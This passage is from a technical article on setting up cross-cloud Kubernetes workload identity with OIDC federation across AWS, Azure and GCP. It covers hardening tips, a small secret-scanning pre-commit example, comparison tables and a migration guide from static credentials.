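    Suitable only for local monitoring/alerting on token age.
    """
    payload_b64 = jwt.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped base64url padding
    claims = json.loads(base64.urlsafe_b64decode(payload_b64))
    return claims["exp"] - now
```

Feeding the projected token file (e.g. the `azure-identity-token` volume above) through this periodically gives you a cheap expiry metric to alert on.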

&lt;h3&gt;
  
  
  4. Audit Logging
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Enable cloud provider audit logs&lt;/li&gt;
&lt;li&gt;Monitor authentication attempts&lt;/li&gt;
&lt;li&gt;Set up alerts for suspicious activity
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Example: Add labels for better tracking&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
    &lt;span class="na"&gt;team&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;platform&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;purpose&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Cross-cloud&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;authentication&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;for&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;data&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;pipeline"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5. Network Security
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use private endpoints where possible&lt;/li&gt;
&lt;li&gt;Implement egress filtering&lt;/li&gt;
&lt;li&gt;Use VPC/VNet peering for enhanced security&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. Credential Scanning
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Never commit workload identity configs to git&lt;/li&gt;
&lt;li&gt;Use tools like git-secrets, gitleaks&lt;/li&gt;
&lt;li&gt;Implement pre-commit hooks&lt;/li&gt;
&lt;/ul&gt;
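A pre-commit hook can be as simple as a regex pass over staged content. The rules below are illustrative toys, not the tested rule sets that git-secrets or gitleaks ship:

```python
import re

# Toy detection rules for illustration only; real scanners maintain far larger rule sets.
PATTERNS = {
    "aws_access_key_id": re.compile(r"AKIA[0-9A-Z]{16}"),
    "gcp_service_account_key": re.compile(r'"private_key_id"\s*:'),
    "azure_client_secret_hint": re.compile(r"(?i)client_secret\s*[:=]"),
}

def scan_text(text: str) -> list[str]:
    """Return the names of all rules that match the given text."""
    return [name for name, pattern in PATTERNS.items() if pattern.search(text)]
```

Wiring this into a pre-commit hook that fails the commit on any non-empty result catches the most obvious leaks before they reach the remote.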




&lt;h2&gt;
  
  
  Production Hardening
&lt;/h2&gt;

&lt;p&gt;For production deployments, implement these additional security measures:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Strict Audience Claims
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ Avoid wildcards or non-standard audiences&lt;/span&gt;
&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:aud"&lt;/span&gt;: &lt;span class="s2"&gt;"*"&lt;/span&gt;

&lt;span class="c"&gt;# ❌ Avoid using Azure audience for AWS (works but not best practice)&lt;/span&gt;
&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:aud"&lt;/span&gt;: &lt;span class="s2"&gt;"api://AzureADTokenExchange"&lt;/span&gt;  &lt;span class="c"&gt;# For AWS targets&lt;/span&gt;

&lt;span class="c"&gt;# ✅ Use cloud-specific audience matching&lt;/span&gt;
&lt;span class="c"&gt;# For AWS:&lt;/span&gt;
&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:aud"&lt;/span&gt;: &lt;span class="s2"&gt;"sts.amazonaws.com"&lt;/span&gt;

&lt;span class="c"&gt;# For Azure:&lt;/span&gt;
&lt;span class="s2"&gt;"audiences"&lt;/span&gt;: &lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"api://AzureADTokenExchange"&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt;

&lt;span class="c"&gt;# For GCP:&lt;/span&gt;
&lt;span class="nt"&gt;--allowed-audiences&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"//iam.googleapis.com/projects/PROJECT_NUMBER/locations/global/workloadIdentityPools/POOL/providers/PROVIDER"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
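On the application side, a defensive check that a token's `aud` claim carries the audience expected for the target cloud might look like this (a sketch; the helper and the mapping are mine, mirroring the audiences configured above):

```python
# Expected audiences per target cloud, matching the federation configuration above.
EXPECTED_AUDIENCE = {
    "aws": "sts.amazonaws.com",
    "azure": "api://AzureADTokenExchange",
}

def audience_matches(claims: dict, target_cloud: str) -> bool:
    """True if the token's `aud` claim includes the audience expected for `target_cloud`.

    `aud` may be a single string or a list per the JWT spec, so both are handled.
    """
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    return EXPECTED_AUDIENCE[target_cloud] in audiences
```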



&lt;h3&gt;
  
  
  2. Exact Subject Matching
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ Avoid broad patterns in production&lt;/span&gt;
&lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub.startsWith('system:serviceaccount:')"&lt;/span&gt;

&lt;span class="c"&gt;# ✅ Use exact namespace and service account&lt;/span&gt;
&lt;span class="nt"&gt;--attribute-condition&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"assertion.sub=='system:serviceaccount:production:app-sa'"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
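The subject being matched is just the Kubernetes service account identity in `system:serviceaccount:NAMESPACE:NAME` form. A small helper (mine, for illustration) makes exact-match conditions easy to generate consistently across environments:

```python
def k8s_oidc_subject(namespace: str, service_account: str) -> str:
    """Build the exact `sub` claim Kubernetes puts in projected service account tokens."""
    return f"system:serviceaccount:{namespace}:{service_account}"

def attribute_condition(namespace: str, service_account: str) -> str:
    """Render an exact-match CEL attribute condition for a GCP Workload Identity provider."""
    return f"assertion.sub=='{k8s_oidc_subject(namespace, service_account)}'"
```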



&lt;h3&gt;
  
  
  3. Dedicated Identity Pools per Cluster
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Create separate Workload Identity Pools for each cluster&lt;/li&gt;
&lt;li&gt;Avoid sharing pools across environments&lt;/li&gt;
&lt;li&gt;Simplifies rotation and isolation&lt;/li&gt;
&lt;/ul&gt;
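Per-cluster pools also mean per-cluster audience strings. Generating them from one helper keeps the naming convention consistent (a sketch; the `-pool`/`-provider` suffixes are an assumed convention, not a GCP requirement):

```python
def wif_audience(project_number: str, pool_id: str, provider_id: str) -> str:
    """Build the GCP Workload Identity Federation audience for one pool/provider pair."""
    return (
        f"//iam.googleapis.com/projects/{project_number}"
        f"/locations/global/workloadIdentityPools/{pool_id}"
        f"/providers/{provider_id}"
    )

def cluster_audience(project_number: str, cluster_name: str) -> str:
    """One dedicated pool and provider per cluster, keyed by cluster name."""
    return wif_audience(project_number, f"{cluster_name}-pool", f"{cluster_name}-provider")
```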

&lt;h3&gt;
  
  
  4. Resource-Scoped IAM
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ Avoid project/subscription-wide roles&lt;/span&gt;
gcloud projects add-iam-policy-binding &lt;span class="nv"&gt;$PROJECT_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:sa@project.iam.gserviceaccount.com"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# ✅ Use bucket-level or resource-level IAM&lt;/span&gt;
gsutil iam ch serviceAccount:sa@project.iam.gserviceaccount.com:objectViewer &lt;span class="se"&gt;\&lt;/span&gt;
  gs://specific-bucket
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5. OIDC Provider Rotation
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Rotate cluster OIDC providers when cluster is recreated&lt;/li&gt;
&lt;li&gt;Update federated credentials accordingly&lt;/li&gt;
&lt;li&gt;Maintain backward compatibility during transition&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. Comprehensive Audit Logging
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# AWS: Enable CloudTrail&lt;/span&gt;
aws cloudtrail create-trail &lt;span class="nt"&gt;--name&lt;/span&gt; cross-cloud-audit

&lt;span class="c"&gt;# Azure: Enable Azure Monitor&lt;/span&gt;
az monitor diagnostic-settings create

&lt;span class="c"&gt;# GCP: Audit logs are enabled by default&lt;/span&gt;
gcloud logging &lt;span class="nb"&gt;read&lt;/span&gt; &lt;span class="s2"&gt;"protoPayload.serviceName=sts.googleapis.com"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  7. Avoid Common Anti-Patterns
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;❌ Don't use &lt;code&gt;roles/storage.admin&lt;/code&gt; when read access suffices&lt;/li&gt;
&lt;li&gt;❌ Don't use &lt;code&gt;startsWith()&lt;/code&gt; conditions in production&lt;/li&gt;
&lt;li&gt;❌ Don't share service accounts across namespaces&lt;/li&gt;
&lt;li&gt;❌ Don't use overly permissive audience claims&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Performance Considerations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Token Caching
&lt;/h3&gt;

&lt;p&gt;Cloud SDKs cache tokens automatically, but constructing a new client on every call still carries overhead. Reuse clients rather than recreating them:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Reuse clients instead of creating new ones
# Bad - creates new client each time
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;bad_example&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;s3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="c1"&gt;# Good - reuse client
&lt;/span&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;good_example&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nf"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="n"&gt;s3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_buckets&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Connection Pooling
&lt;/h3&gt;

&lt;p&gt;Use connection pooling for better performance:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;botocore.config&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Config&lt;/span&gt;

&lt;span class="n"&gt;config&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;Config&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;max_pool_connections&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;retries&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;max_attempts&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;s3&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;s3&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;config&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Comparison Matrix
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Feature&lt;/th&gt;
&lt;th&gt;EKS (IRSA)&lt;/th&gt;
&lt;th&gt;AKS (Workload Identity)&lt;/th&gt;
&lt;th&gt;GKE (Workload Identity)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Setup Complexity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;td&gt;Low&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Native Integration&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AWS&lt;/td&gt;
&lt;td&gt;Azure&lt;/td&gt;
&lt;td&gt;GCP&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-cloud Support&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Via OIDC&lt;/td&gt;
&lt;td&gt;Via Federated Credentials&lt;/td&gt;
&lt;td&gt;Via WIF Pools&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token Injection&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;td&gt;Automatic (webhook)&lt;/td&gt;
&lt;td&gt;Automatic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token Lifetime&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;1 hour (configurable)&lt;/td&gt;
&lt;td&gt;24 hours (default)&lt;/td&gt;
&lt;td&gt;1 hour (default)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience Customization&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;td&gt;✅ Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Pod Identity Webhook&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Built-in (managed by EKS)&lt;/td&gt;
&lt;td&gt;Required (enabled as an add-on)&lt;/td&gt;
&lt;td&gt;Not required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Annotation Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Role ARN&lt;/td&gt;
&lt;td&gt;Client ID&lt;/td&gt;
&lt;td&gt;GSA Email&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Native to K8s&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes (GKE only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Requires External JSON&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No (AWS), Yes (cross-cloud)&lt;/td&gt;
&lt;td&gt;No (Azure), Yes (cross-cloud)&lt;/td&gt;
&lt;td&gt;No (GCP), Yes (cross-cloud)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;STS Call Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Cross-Cloud Setup Complexity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;Medium&lt;/td&gt;
&lt;td&gt;High&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
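&lt;p&gt;The token-lifetime and audience rows above are directly observable: a projected token is a JWT, and its middle segment is base64url-encoded JSON. Here is a minimal, standard-library-only sketch; the claims are fabricated for illustration, not read from a real cluster:&lt;/p&gt;

```python
import base64
import json
import time

def decode_jwt_claims(token):
    """Decode the payload segment of a JWT without verifying the signature."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Fabricated claims mimicking a projected token bound to the AWS STS audience
claims = {
    "aud": ["sts.amazonaws.com"],
    "sub": "system:serviceaccount:default:s3-access-sa",
    "exp": int(time.time()) + 3600,
}
header = base64.urlsafe_b64encode(b'{"alg":"RS256"}').decode().rstrip("=")
payload = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
fake_token = ".".join([header, payload, "sig"])

decoded = decode_jwt_claims(fake_token)
print(decoded["aud"], decoded["sub"])
```

&lt;p&gt;Pointing the same decoder at a token mounted in a pod shows exactly which audience and expiry the kubelet requested.&lt;/p&gt;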

&lt;h3&gt;
  
  
  Cloud-Specific Characteristics
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Characteristic&lt;/th&gt;
&lt;th&gt;AWS&lt;/th&gt;
&lt;th&gt;Azure&lt;/th&gt;
&lt;th&gt;GCP&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Validation Method&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;AssumeRoleWithWebIdentity&lt;/td&gt;
&lt;td&gt;Federated credential match&lt;/td&gt;
&lt;td&gt;Workload Identity Pool exchange&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Token Exchange&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Direct STS call&lt;/td&gt;
&lt;td&gt;Entra ID token exchange&lt;/td&gt;
&lt;td&gt;Multi-step (STS → SA impersonation)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Best Practice Audience&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sts.amazonaws.com&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;api://AzureADTokenExchange&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;WIF Pool-specific&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Audience Flexibility&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Strict (validates aud claim)&lt;/td&gt;
&lt;td&gt;Strict (must match federated credential)&lt;/td&gt;
&lt;td&gt;Flexible (configured in pool provider)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Thumbprint Required&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Yes (root CA)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
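&lt;p&gt;The "multi-step" GCP exchange in the table can be made concrete. The first hop is an OAuth token exchange (RFC 8693) against &lt;code&gt;https://sts.googleapis.com/v1/token&lt;/code&gt;; the sketch below builds that request body (the project number, pool, and provider names are placeholders):&lt;/p&gt;

```python
import urllib.parse

# Placeholder identifiers; substitute your project number, pool, and provider
AUDIENCE = (
    "//iam.googleapis.com/projects/123456789/locations/global/"
    "workloadIdentityPools/my-pool/providers/my-provider"
)

def sts_exchange_body(k8s_token):
    """Form body for the first hop of GCP Workload Identity Federation."""
    return urllib.parse.urlencode({
        "grant_type": "urn:ietf:params:oauth:grant-type:token-exchange",
        "audience": AUDIENCE,
        "scope": "https://www.googleapis.com/auth/cloud-platform",
        "requested_token_type": "urn:ietf:params:oauth:token-type:access_token",
        "subject_token_type": "urn:ietf:params:oauth:token-type:jwt",
        "subject_token": k8s_token,  # the projected service account JWT
    })

body = sts_exchange_body("projected-token-goes-here")
print("grant_type" in body)  # True
```

&lt;p&gt;The federated token returned by this call is then used for the second hop, impersonating the target Google service account via &lt;code&gt;generateAccessToken&lt;/code&gt;; the GCP client libraries perform both hops automatically when given a credential configuration file.&lt;/p&gt;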




&lt;h2&gt;
  
  
  Migration Guide
&lt;/h2&gt;

&lt;h3&gt;
  
  
  From Static Credentials to Workload Identity
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Audit current credential usage&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Find all secrets with credentials&lt;/span&gt;
kubectl get secrets &lt;span class="nt"&gt;--all-namespaces&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; json | &lt;span class="se"&gt;\&lt;/span&gt;
  jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.items[] | select(.type=="Opaque") | .metadata.name'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
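&lt;p&gt;Listing Opaque secrets only tells you what exists; it also helps to know which workloads consume them. A hypothetical helper that walks the parsed output of &lt;code&gt;kubectl get deployments -o json&lt;/code&gt; and reports the deployments referencing a given secret:&lt;/p&gt;

```python
def deployments_using_secret(deploy_list, secret_name):
    """Return deployment names that mount or envFrom the given secret."""
    hits = []
    for item in deploy_list.get("items", []):
        pod_spec = item["spec"]["template"]["spec"]
        refs = []
        for vol in pod_spec.get("volumes", []) or []:
            refs.append(vol.get("secret", {}).get("secretName"))
        for container in pod_spec.get("containers", []):
            for env_from in container.get("envFrom", []) or []:
                refs.append(env_from.get("secretRef", {}).get("name"))
        if secret_name in refs:
            hits.append(item["metadata"]["name"])
    return hits

# Fabricated example of what `kubectl get deployments -o json` returns
sample = {"items": [{
    "metadata": {"name": "payments"},
    "spec": {"template": {"spec": {
        "containers": [{"envFrom": [{"secretRef": {"name": "aws-creds"}}]}],
        "volumes": [],
    }}},
}]}
print(deployments_using_secret(sample, "aws-creds"))  # → ['payments']
```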



&lt;p&gt;&lt;strong&gt;Step 2: Set up workload identity&lt;/strong&gt; (follow scenarios above)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Deploy test pod&lt;/strong&gt; with workload identity&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 4: Validate access&lt;/strong&gt; before removing static credentials&lt;/p&gt;
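&lt;p&gt;This validation lends itself to a small check you can run inside the test pod. A sketch for the EKS case; the environment variable names are the ones IRSA injects, and you can pass a fake mapping when experimenting locally:&lt;/p&gt;

```python
import os

def irsa_ready(environ=os.environ):
    """True if IRSA env vars point at a readable, non-empty token file."""
    token_file = environ.get("AWS_WEB_IDENTITY_TOKEN_FILE")
    role_arn = environ.get("AWS_ROLE_ARN")
    if not token_file or not role_arn:
        return False
    try:
        with open(token_file) as f:
            return bool(f.read().strip())
    except OSError:
        return False

print(irsa_ready({}))  # → False outside an IRSA-enabled pod
```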

&lt;p&gt;&lt;strong&gt;Step 5: Update application code&lt;/strong&gt; to remove explicit credential loading&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 6: Remove credential secrets&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete secret &amp;lt;credential-secret-name&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 7: Monitor and verify&lt;/strong&gt; in production&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Cross-cloud authentication using workload identity provides a secure, scalable, and maintainable approach to multi-cloud Kubernetes deployments. By leveraging OIDC federation, you eliminate the risks associated with static credentials while gaining fine-grained access control and better auditability.&lt;/p&gt;

&lt;h3&gt;
  
  
